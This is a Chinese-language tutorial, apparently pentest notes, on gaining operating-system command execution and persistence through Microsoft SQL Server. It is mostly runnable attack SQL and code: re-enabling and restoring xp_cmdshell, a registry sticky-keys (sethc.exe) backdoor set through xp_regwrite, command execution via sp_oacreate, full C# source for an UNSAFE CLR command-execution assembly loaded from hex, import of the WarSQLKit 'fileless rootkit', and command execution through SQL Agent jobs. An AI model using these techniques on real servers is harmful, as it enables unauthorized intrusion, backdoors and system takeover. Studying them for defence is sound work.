简介
SQL Server 是 Microsoft 开发的关系数据库管理系统(RDBMS)。 它是市场上最受欢迎的 DBMS 之一。SQL Server 具有极其广泛的用途,它可以在各个方面使用,从存储个人博客的内容到存储客户数据等
在 2017 版之前,SQL Server 仅适用于 Windows。 SQL Server 2017 中最大的变化之一是,它现在可在 Linux 和 Docker 容器上使用。 这意味着可以在 Mac 上运行 SQL Server
危险的存储过程
xp_cmdshell
查询 xp_cmdshell 存储过程是否存在
xtype 为对象类型,xtype=’x’,表示存储过程的对象类型为扩展存储过程
select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' # 存在则返回 1xp_cmdshell 的开启与关闭
开启
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;恢复 xp_cmdshell 存储过程
Error Message: 未能找到存储过程 ‘master..xp_cmdshell’,即 xp_cmdshell 被删除,恢复方式如下
第一步删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'第二步恢复
dbcc addextendedproc("sp_oacreate","odsole70.dll")
dbcc addextendedproc("xp_cmdshell"," ")上传 xplog70.dll,恢复扩展存储过过程 xp_cmdshell
dbcc addextendedproc("xp_cmdshell","xplog70.dll")注册表相关操作
SQL Server 存在一系列的存储过程,可以对注册表进行增删改查。xp_regread、xp_regwrite、xp_regdeletvalue、xp_regdeletkey、xp_regaddmultistring 等
xp_regread 读注册表
exec xp_regread 'HKEY_current_user','Control Panel\International','sCountry'
# exec xp_regread [键], [子键], [键值]
exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH' # 判断子健是否存在xp_regaddmultistring 枚举可用的注册表键值
exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International'xp_regwrite 修改注册表
查看 xp_regwrite 是否启用
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'开启 xp_regwrite
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_regwrite', 1
RECONFIGURE关闭 xp_regwrite
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_regwrite', 0
RECONFIGURE修改注册表
EXEC xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'
# 修改粘滞键的键值xp_regdeletekey 删除指定注册表键值对
删除粘滞键的键值
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'xp_fileexist
判读文件是否存在,第一列返回 0 表示文件不存在,返回 1 表示文件存在。当执行完无回显命令时,一般都将结果输入至文件中,利用此存储过程可以判断无回显命令是否执行成功
exec xp_fileexist 'C:\Users\MSSQLSERVER\1.txt'xp_subdirs
列出当前目录
exec xp_subdirs "C:\\"xp_getnetname
获取服务器名称
exec xp_getnetnamexp_msver
获取服务器信息
exec xp_msverSQL Server COM 组件
SQL Server 中的 COM 组件 SP_OACREATE,执行系统命令,但是此利用方法无回显
查询 SP_OACREATE 是否存在
返回 1 则存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'SP_OACREATE 的开启与关闭
开启
exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;关闭
exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
exec sp_configure 'Ole Automation Procedures', 0; RECONFIGURE WITH OVERRIDE;执行系统命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami /all > C:\\Users\\MSSQLSERVER\\test.txt'SQL Server CLR 相关利用
公共语言运行时 (CLR) 集成编程概念
从 SQL Server 2005 (9.x) 开始,SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。 这意味着现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数
CLR 方式可以利用 16 进制文件流方式导入 DLL 文件,不需要文件落地
利用步骤
- 编写 CLR
- 启用 MSSQL CLR 功能
- 利用 SQL 语句导入程序集
- 执行系统命令
编写 CLR
使用 Visual Studio 创建工程
修改目标平台和勾选创建脚本,这里是 SQL Server 2014
修改目标框架和权限级别为 UNSAFE
在 SQL Server 2005 中引入了从 MSSQL 运行.NET 代码的功能,并在后续版本中叠加了许多保护措施,来限制代码可以访问的内容。在创建.Net 程序集时,会给它们指定一个权限级别
其权限集有三个选项SAFE:基本上只将 MSSQL 数据集暴露给代码,其他大部分操作则都被禁止
EXTERNAL_ACCESS:允许访问底层服务器上某些资源,但不应该允许直接执行代码
UNSAFE:允许使用任何代码
创建 SQL CLR C# 存储过程
代码如下
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecCommand (string cmd)
{
// 在此处放置代码
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
public static string RunCommand(string filename,string arguments)
{
var process = new Process();
process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
if (process.ExitCode == 0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message = new StringBuilder();
if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
return stdOutput.ToString();
}
}编译生成 DLL
启用 CLR
SQL Server 2017 版本之前
sp_configure 'show advanced options',1;RECONFIGURE; -- 显示高级选项
sp_configure 'clr enabled',1;RECONFIGURE; -- 启用CLR
ALTER DATABASE master SET TRUSTWORTHY ON; -- 将存储.Net程序集的数据库配置为可信赖的SQL Server 2017 版本及之后
sp_configure 'show advanced options',1;RECONFIGURE;
sp_configure 'clr enabled',1;RECONFIGURE;
sp_add_trusted_assembly @hash= <SHA512 of DLL>; -- 将某程序集的SHA512哈希值添加到可信程序集列表中程序集的导入和创建
通过十六进制字符串创建程序集
CREATE ASSEMBLY clrassem from <HEX STRING> WITH PERMISSION_SET = UNSAFECREATE ASSEMBLY [CLR]
AUTHORIZATION [dbo]
FROM 0x4d5a....
WITH PERMISSION_SET = UNSAFE;
GO创建存储过程,以从程序集运行代码
CREATE PROCEDURE debugrun AS EXTERNAL NAME clrassem.StoredProcedures.runnerCREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [CLR].[StoredProcedures].[ExecCommand]
go利用 CLR 执行系统命令
exec dbo.ExecCommand "whoami /all"删除存储过程、程序集以及受信任的哈希值
SQL Server 2017 之前的版本
ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY OFFSQL Server 2017 及更高版本
sp_drop_trusted_assembly @hash=<SHA512 of DLL>通用
DROP PROCEDURE debugrun;
DROP ASSEMBLY clrassem;
sp_configure 'clr strict security',1;RECONFIGURE
sp_configure 'show advanced options',0;RECONFIGUREWarSQLKit
WarSQLKit 是一个针对 MSSQL CLR 进行利用的工具,有以下两个版本
- WarSQLKit 是完全版本,内置多种功能。
- WarSQLKitMinimal 是简化版,只能执行命令。
项目地址:https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit
导入方式和前面差不多
# 导入
CREATE ASSEMBLY [WarSQLKit]
AUTHORIZATION [dbo]
FROM 0x4D5A......
WITH PERMISSION_SET = UNSAFE;
GO
# 创建
CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](max)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO用法见 README
SQL Server Agent Job 代理执行计划任务利用
SQL Server 代理是一项 Microsoft Windows 服务,它执行计划的管理任务,这些任务在 SQL Server 中称为作业
在 Sql Server 配置管理器,启用 SQL Server 代理,注意 Express 版本 Sql Server 是无法启用的
创建计划任务
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';